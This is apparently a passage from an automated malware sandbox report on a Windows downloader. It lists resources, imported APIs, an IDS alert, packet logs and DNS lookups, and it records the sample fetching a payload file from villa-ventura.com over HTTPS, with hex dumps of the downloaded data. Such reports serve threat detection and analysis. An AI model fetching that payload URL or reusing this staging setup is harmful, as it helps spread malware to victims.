              RT_ICON0x4368500x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.6111751152073732
              RT_ICON0x436f180x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3725609756097561
              RT_ICON0x4375800x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.4436416184971098
              RT_ICON0x437ae80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6595744680851063
              RT_ICON0x437f500x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.48118279569892475
              RT_ICON0x4382380x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.5327868852459017
              RT_ICON0x4384200x130Device independent bitmap graphic, 32 x 64 x 1, image size 128EnglishUnited States0.694078947368421
              RT_ICON0x4385500x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5777027027027027
              RT_ICON0x4386780xb0Device independent bitmap graphic, 16 x 32 x 1, image size 64EnglishUnited States0.6590909090909091
              RT_DIALOG0x4387280x100dataEnglishUnited States0.5234375
              RT_DIALOG0x4388280x11cdataEnglishUnited States0.6056338028169014
              RT_DIALOG0x4389480xc4dataEnglishUnited States0.5918367346938775
              RT_DIALOG0x438a100x60dataEnglishUnited States0.7291666666666666
              RT_GROUP_ICON0x438a700x11edataEnglishUnited States0.5804195804195804
              RT_VERSION0x438b900x1bcdataEnglishUnited States0.5608108108108109
              RT_MANIFEST0x438d500x33eXML 1.0 document, ASCII text, with very long lines (830), with no line terminatorsEnglishUnited States0.5542168674698795

              Imports

              DLLImport
              ADVAPI32.dllRegCreateKeyExW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, SetFileSecurityW, RegOpenKeyExW, RegEnumValueW
              SHELL32.dllSHGetSpecialFolderLocation, SHFileOperationW, SHBrowseForFolderW, SHGetPathFromIDListW, ShellExecuteExW, SHGetFileInfoW
              ole32.dllOleInitialize, OleUninitialize, CoCreateInstance, IIDFromString, CoTaskMemFree
              COMCTL32.dllImageList_Create, ImageList_Destroy, ImageList_AddMasked
              USER32.dllGetClientRect, EndPaint, DrawTextW, IsWindowEnabled, DispatchMessageW, wsprintfA, CharNextA, CharPrevW, MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, GetSystemMetrics, FillRect, AppendMenuW, TrackPopupMenu, OpenClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, PeekMessageW, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, EmptyClipboard, CreatePopupMenu
              GDI32.dllSetBkMode, SetBkColor, GetDeviceCaps, CreateFontIndirectW, CreateBrushIndirect, DeleteObject, SetTextColor, SelectObject
              KERNEL32.dllGetExitCodeProcess, WaitForSingleObject, GetModuleHandleA, GetProcAddress, GetSystemDirectoryW, lstrcatW, Sleep, lstrcpyA, WriteFile, GetTempFileNameW, CreateFileW, lstrcmpiA, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, SetEnvironmentVariableW, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, MulDiv, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, MoveFileExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW

              Possible Origin

              Language of compilation systemCountry where language is spokenMap
              EnglishUnited States

              Network Behavior

              Suricata IDS Alerts

              TimestampProtocolSIDSignatureSource PortDest PortSource IPDest IP
              2024-07-26T23:55:52.759567+0200TCP2803270ETPRO MALWARE Common Downloader Header Pattern UHCa49778443192.168.11.20185.90.59.130

              Network Port Distribution

              TCP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 26, 2024 23:55:51.426534891 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:51.426632881 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:51.426857948 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:51.452259064 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:51.452327013 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.146090984 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.146343946 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:52.146343946 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:52.181915998 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:52.181955099 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.182595968 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.183543921 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:52.184777021 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:52.228219032 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.759550095 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.759596109 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.759691954 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:52.759715080 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:52.759820938 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:52.759886980 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.075077057 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.075088024 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.075315952 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.075373888 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.075560093 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.075687885 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.075687885 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.075784922 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.076066017 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.076297998 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.109394073 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.109633923 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.109692097 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.391743898 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.391763926 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.392018080 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.392066002 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.392340899 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.392663002 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.392806053 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.392975092 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.393140078 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.393312931 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.393443108 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.393471003 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.393487930 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.393640041 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.393640041 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.393733978 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.426131964 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.426386118 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.708338022 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.708384037 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.708576918 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.708673000 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.710458994 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.710680962 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.710680962 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.711194992 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.711354017 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.711455107 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.712379932 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.712774992 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.712774992 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.713056087 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.713226080 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.713355064 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.713480949 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.713635921 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.713776112 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.713804960 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.713999033 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.714088917 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.714190960 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.714415073 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.714499950 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.714637995 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.714768887 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.714900970 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.715040922 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.715223074 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.715248108 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.715282917 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.715415955 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.715642929 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.742772102 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.742947102 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.742947102 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.743133068 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.743339062 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.743386984 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:53.743544102 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:53.743686914 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.025758028 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.025795937 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.025923014 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.025923014 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.025979996 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026025057 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.026030064 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026082993 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.026175022 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026175022 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026220083 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026268005 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026745081 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.026894093 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026895046 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.026948929 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.027092934 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.027431965 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.027576923 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.027576923 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.027626038 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.027806044 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.028141975 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.028450966 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.028711081 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.028868914 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.029073954 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.031729937 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.031883955 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032139063 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032300949 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.032475948 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032603025 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.032871962 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.033070087 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033129930 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033373117 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.033513069 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033513069 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033565998 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033610106 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033808947 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.033952951 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033952951 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.033999920 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.034020901 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.034118891 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.034200907 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.104484081 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.104484081 CEST49778443192.168.11.20185.90.59.130
              Jul 26, 2024 23:55:54.104517937 CEST44349778185.90.59.130192.168.11.20
              Jul 26, 2024 23:55:54.104674101 CEST49778443192.168.11.20185.90.59.130

              UDP Packets

              TimestampSource PortDest PortSource IPDest IP
              Jul 26, 2024 23:55:50.945802927 CEST5929353192.168.11.201.1.1.1
              Jul 26, 2024 23:55:51.422103882 CEST53592931.1.1.1192.168.11.20

              DNS Queries

              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
              Jul 26, 2024 23:55:50.945802927 CEST192.168.11.201.1.1.10xe567Standard query (0)villa-ventura.comA (IP address)IN (0x0001)false

              DNS Answers

              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
              Jul 26, 2024 23:55:51.422103882 CEST1.1.1.1192.168.11.200xe567No error (0)villa-ventura.com185.90.59.130A (IP address)IN (0x0001)false

              HTTP Request Dependency Graph

              • villa-ventura.com

              HTTPS Proxied Packets

              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
              0192.168.11.2049778185.90.59.1304435076C:\Users\user\AppData\Local\Temp\Sammentrykket.exe
              TimestampBytes transferredDirectionData
              2024-07-26 21:55:52 UTC182OUTGET /FPkXcnPDrjTal168.bin HTTP/1.1
              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
              Host: villa-ventura.com
              Cache-Control: no-cache
              2024-07-26 21:55:52 UTC249INHTTP/1.1 200 OK
              Date: Fri, 26 Jul 2024 21:55:52 GMT
              Server: Apache
              Upgrade: h2,h2c
              Connection: Upgrade, close
              Last-Modified: Mon, 22 Jul 2024 07:18:39 GMT
              Accept-Ranges: bytes
              Content-Length: 286784
              Content-Type: application/octet-stream
              2024-07-26 21:55:52 UTC7943INData Raw: 87 43 37 f7 ca 18 86 fd 70 5d 03 97 9e 35 9b 37 3c 86 48 d2 8c 7f 40 26 dd 5c 81 73 b2 1c 10 f4 76 ab f1 3f ab 8c 92 d8 12 a2 f6 96 3f 7f 15 7a c9 e7 ff 0e 21 bb 5e bd 05 b4 72 a4 36 bf 31 48 ac 6b 92 ff 6b 7c c8 e4 db d1 ad 7b a5 c0 bf 33 8a 0a fb 24 39 a2 82 48 88 c1 54 0d 50 9f cf 5f b4 84 f9 76 a7 02 82 f0 8f 0e c5 02 0b 78 16 cd 28 a1 84 12 e1 e1 1b 7e b3 e5 20 89 71 af f5 6c 21 1c d7 b1 47 bb d5 cf 73 63 c5 ab 30 8c 59 ab 0f f2 7f 6f e4 f4 f1 c6 af c0 37 f9 62 47 f5 c4 77 02 1c a5 53 39 20 d9 04 8c 0c 4d d8 4f 3f 67 38 ae 37 e1 cc 51 23 3b 8f 1f 09 91 58 8f 17 66 31 99 1c a7 17 84 56 99 f9 44 b0 66 03 eb 44 15 43 cc 0b 36 76 33 58 68 62 5e 3a 11 e9 56 b6 28 a7 d2 73 f1 ad 1f 35 97 e7 0a 38 9e 3e bb b1 16 a3 ba 9c 27 b1 1c b0 22 db 19 8d 6e 8b b7 13
              Data Ascii: C7p]57<H@&\sv??z!^r61Hkk|{3$9HTP_vx(~ ql!Gsc0Yo7bGwS9 MO?g87Q#;Xf1VDfDC6v3Xhb^:V(s58>'"n
              2024-07-26 21:55:53 UTC8000INData Raw: f6 44 a8 a7 2e 59 9b 62 ad 42 09 58 0e b2 a5 30 6d c9 83 c4 92 99 41 93 e5 6f 0e 39 4c 1d 73 a7 fc 76 05 f1 61 d0 a2 e5 bb ee 54 c3 0e f9 fa e6 bc b1 69 a6 f7 e3 9c 18 31 68 da 9d 7e 6d a3 42 f1 7b 9b 29 bc c0 ef 44 a4 9b ed bf c6 20 9b a6 9e 55 78 80 18 3d 36 73 9d dd 52 fd 55 93 61 78 08 df f7 e9 59 4a b8 2f 5b 7a 3b 7b b8 b0 5c 4c 7b 2c 13 4c c7 d5 5f 25 22 9a ce 2d 13 6c ca 8b 9c 3e 16 61 8f 57 19 71 67 3d 9f a5 57 d0 31 ef 81 e5 be d9 ce 66 d4 e1 93 59 4c 20 46 1b 6e 52 e2 03 bd f2 03 1f 72 02 66 0f cd 9b d4 f5 b8 e5 37 49 61 a6 88 6f e8 04 4b ac 32 66 6d 41 82 9f 1b a4 01 6a 4c 6f fd 57 81 0f b4 32 23 90 c5 16 58 2c c7 52 5c ab 20 76 b3 18 76 63 44 48 c1 0e a9 7c fd e5 1a ec 2f 83 9d 7b 4a d7 bf cc c5 4d 75 e7 29 6b c5 be b7 da 71 25 28 6a f0 d7 c0
              Data Ascii: D.YbBX0mAo9LsvaTi1h~mB{)D Ux=6sRUaxYJ/[z;{\L{,L_%"-l>aWqg=W1fYL FnRrf7IaoK2fmAjLoW2#X,R\ vvcDH|/{JMu)kq%(j
              2024-07-26 21:55:53 UTC8000INData Raw: fc 37 d4 97 3b 6d e3 18 63 53 b5 27 9b 34 dd 36 2d e3 5d 0c 3e 8b dd c9 bb 44 9b 47 6c f7 fd 2e 12 5f 46 61 bd 3e 0a 1d 52 b9 ee f2 fe e8 63 71 e2 2c 45 6e 5c 3f 39 60 b7 00 81 47 26 b6 d1 05 66 aa b3 cf 7f 45 8f fb fb 31 cc b4 9f b4 16 4e bf 36 03 b8 19 37 25 20 8f 64 b2 56 32 a9 89 8c 4c 6c d1 bc 32 5a 06 6d 14 96 2d ba b2 45 b2 10 74 e7 05 dd e3 31 b2 43 d3 98 96 a1 e6 79 18 d6 a8 09 03 c1 74 ee 67 33 59 9b 73 10 35 59 84 42 2a 80 2e c7 5e e2 cc 23 fc b6 66 cb a0 46 94 f7 35 4c 9e 4b 9d c2 fb 3e b0 bc 80 0e 0f 00 e4 f0 8c 64 66 c3 e0 0d d8 58 90 b3 4f 82 7f 3b 1b 1f 21 1a 76 4f 5f 53 45 22 9c 9a b0 4a c8 7e 25 d3 25 d7 35 5b 4b 73 fa ae f1 e7 30 95 45 9f 84 56 06 ad 14 73 b3 09 d1 1e eb 7e 63 80 fb e2 be 54 c0 73 b7 51 d7 87 fa 40 d2 8d ca 0a b7 52 96
              Data Ascii: 7;mcS'46-]>DGl._Fa>Rcq,En\?9`G&fE1N67% dV2Ll2Zm-Et1Cytg3Ys5YB*.^#fF5LK>dfXO;!vO_SE"J~%%5[Ks0EVs~cTsQ@R
              2024-07-26 21:55:53 UTC8000INData Raw: 6b 7c 1b ba 8e 8e 1a 20 06 fc 38 44 b6 f1 b1 8f 85 0f 56 d8 c4 ef d1 3a cc 04 d1 3c 9c 9a 4b 4c 0a 32 c0 37 72 b0 26 b2 69 a4 6f 3c 20 82 cb 45 78 14 41 d2 b1 a5 c3 c1 68 c0 b2 04 7e 5b 96 2c 8c 2b 75 d9 b4 11 25 08 b5 68 4d 37 67 1b 3f 07 a6 16 13 1c f9 d8 83 ad b3 0c 9b 14 07 6c 5e 54 2f 61 e1 47 f3 8a 0d 7c 77 6f 7c 60 5b 39 eb dc b8 81 e6 36 c5 1f c3 4c b0 c8 a8 a4 e7 d1 5a 2c 2b 1c 83 3c 44 6f 3a 67 20 7a 89 92 fc b3 dc 87 7a 27 db 2e d5 b3 00 0e dc c0 fe e0 18 49 d6 28 45 d3 64 3c 73 41 50 60 bd b4 73 8d c6 c1 2f 48 4f c9 6d 91 b1 bc ba 70 2b a4 5e 31 ec 08 3f 58 e4 fc 2b 4f 47 f4 4d 13 16 f2 70 33 5d b4 94 1a 73 d7 c9 2e 75 7a ee 03 15 bd bc a4 ba 2b 3c 12 cc 25 fc b9 39 f3 5f af 5c de 19 4c c1 c0 1c a6 d0 d4 8e 28 6b 25 f3 f6 fa b8 22 04 55 a1 c2
              Data Ascii: k| 8DV:<KL27r&io< ExAh~[,+u%hM7g?l^T/aG|wo|`[96LZ,+<Do:g zz'.I(Ed<sAP`s/HOmp+^1?X+OGMp3]s.uz+<%9_\L(k%"U
              2024-07-26 21:55:53 UTC8000INData Raw: 5e 0d 72 e2 42 d6 f2 e5 8e bd 59 6c f0 63 23 a7 52 7e 3f e5 4e 40 25 a6 b3 3d d9 a8 69 e4 37 e9 57 a3 be fa e6 31 15 a1 88 0c fb be 20 d0 11 c8 b2 7e f0 42 ad d4 54 f9 f4 6e a6 44 25 e9 54 de d3 c9 23 7b 8a 81 f8 c9 b7 3b a0 9f 93 cb 8e d5 09 cf 33 65 16 10 08 0d 43 ff 13 50 a0 c7 87 0d 6f f6 08 a8 64 21 0b 59 43 43 6e 40 39 bb bc ad 1e 28 10 09 3b 78 35 08 77 3c 56 33 fd 07 04 e5 29 72 cd 76 3b 3f c8 87 8e bc 8f 87 31 c7 f9 21 8c e7 fb e8 a3 95 bb 8f ff 7b 9c 94 a0 28 40 9d de c9 c9 6c c8 bc cd d1 b1 2b 9a fb 3d bd 91 c4 39 6c 21 ae c2 9b 91 69 90 1a af f8 2a f4 f5 0a dd 09 f0 21 74 34 6d 9f 7e 5e 1b 3d 95 83 ae 04 b1 70 fc e7 ee 7e 09 ad 2a cb 5b cd e6 56 8c d0 36 24 65 d2 1d b7 80 4f 3c b4 2b ac 64 7e 26 14 20 ee 04 9c aa b2 dc 43 54 04 7a b4 f3 9c ec
              Data Ascii: ^rBYlc#R~?N@%=i7W1 ~BTnD%T#{;3eCPod!YCCn@9(;x5w<V3)rv;?1!{(@l+=9l!i*!t4m~^=p~*[V6$eO<+d~& CTz
              2024-07-26 21:55:53 UTC8000INData Raw: 0d cb 37 ac 14 83 bf 5d e9 7c e5 b1 8f dc 52 63 63 ec 60 be ad 9c 86 d6 c6 f6 1b 90 6b d5 5d be b7 f7 fe 7f da 5c 73 ae 13 c1 d1 1d f3 a3 c9 a7 c5 19 24 a7 e0 d8 d1 4b 93 ba 66 9a 99 61 62 02 a4 3b e3 45 9b d7 cf 90 0a fb 66 c2 38 a3 4b 14 3e e8 4b 9c cb 7b 5c 58 8e 42 6e cc 9f d1 a3 ce 67 00 fd c1 ef 8b a4 2f 43 b2 e4 e5 b2 df 3b b8 01 15 04 47 2c 8d d0 0c 8e aa 72 1b 72 20 86 6c ed bf 8f 64 5d 6c 9e bf 66 2c c4 36 01 b8 aa 02 0c 43 37 f7 1a ab ae 6c 73 09 77 f3 fa bb 36 5a a1 b9 c2 94 5f 2b a4 92 df d7 6d 36 5e ad 5d 41 0e 52 3b 84 eb f8 75 2b 9c 85 47 ca c1 03 c6 2e fa 75 ff a9 b8 c4 c6 18 42 57 d7 85 87 84 b2 cd 67 2b f2 7b ad e4 2c aa da fc ce 28 df 8f 89 f3 ea 1e f1 2a 8f bd 81 d9 37 7f 48 a2 a7 02 64 14 01 a6 2c c1 10 43 88 21 48 f8 86 35 70 8f 03
              Data Ascii: 7]|Rcc`k]\s$Kfab;Ef8K>K{\XBng/C;G,rr ld]lf,6C7lsw6Z_+m6^]AR;u+G.uBWg+{,(*7Hd,C!H5p
              2024-07-26 21:55:53 UTC8000INData Raw: f4 3e c3 9b 21 ce e5 3c 1d 58 f2 8b cd 58 84 36 63 40 c4 2a 76 65 11 d5 25 d4 41 aa 6a 76 a0 2f de cb 93 46 8d ca 55 04 59 86 c3 51 3d 18 5b db f5 86 33 2d 46 bb e2 ab 17 fc 37 3c 84 91 46 4e 6a 40 f5 96 92 b2 a9 c7 cc 9b a4 27 86 af 19 08 39 61 17 c8 bb a0 dc ec 31 1c 30 04 08 eb 1f 3d 6d b6 a5 31 f4 42 1e 46 0f d8 bb 8b 97 21 c9 a7 8b df 56 d2 d1 65 d4 4c 7b 59 34 92 df 9f 3a 57 57 fe 88 3b 40 da d8 b4 26 bb 3c 5e c6 6d 1c 5f c5 b4 54 72 2e db f1 25 9f 09 5a 08 f5 76 9c 67 9c 5b 9f 5d ee ea c9 32 97 62 f3 32 ac b8 a6 5a 0d 3f f9 1a a6 48 26 05 e9 e3 df 80 01 b4 e0 b3 13 bb 04 6e a9 86 f7 d0 eb aa 4d 10 9f 44 fe 5c 06 ce c3 1f 67 c7 78 4f 23 c0 73 01 26 6c c4 82 aa 21 39 7a 72 1c 4e dc aa 62 e6 ea a5 de 27 79 fd 5a c6 95 9e 01 08 3a 83 c7 72 52 86 48 82
              Data Ascii: >!<XX6c@*ve%Ajv/FUYQ=[3-F7<FNj@'9a10=m1BF!VeL{Y4:WW;@&<^m_Tr.%Zvg[]2b2Z?H&nMD\gxO#s&l!9zrNb'yZ:rRH
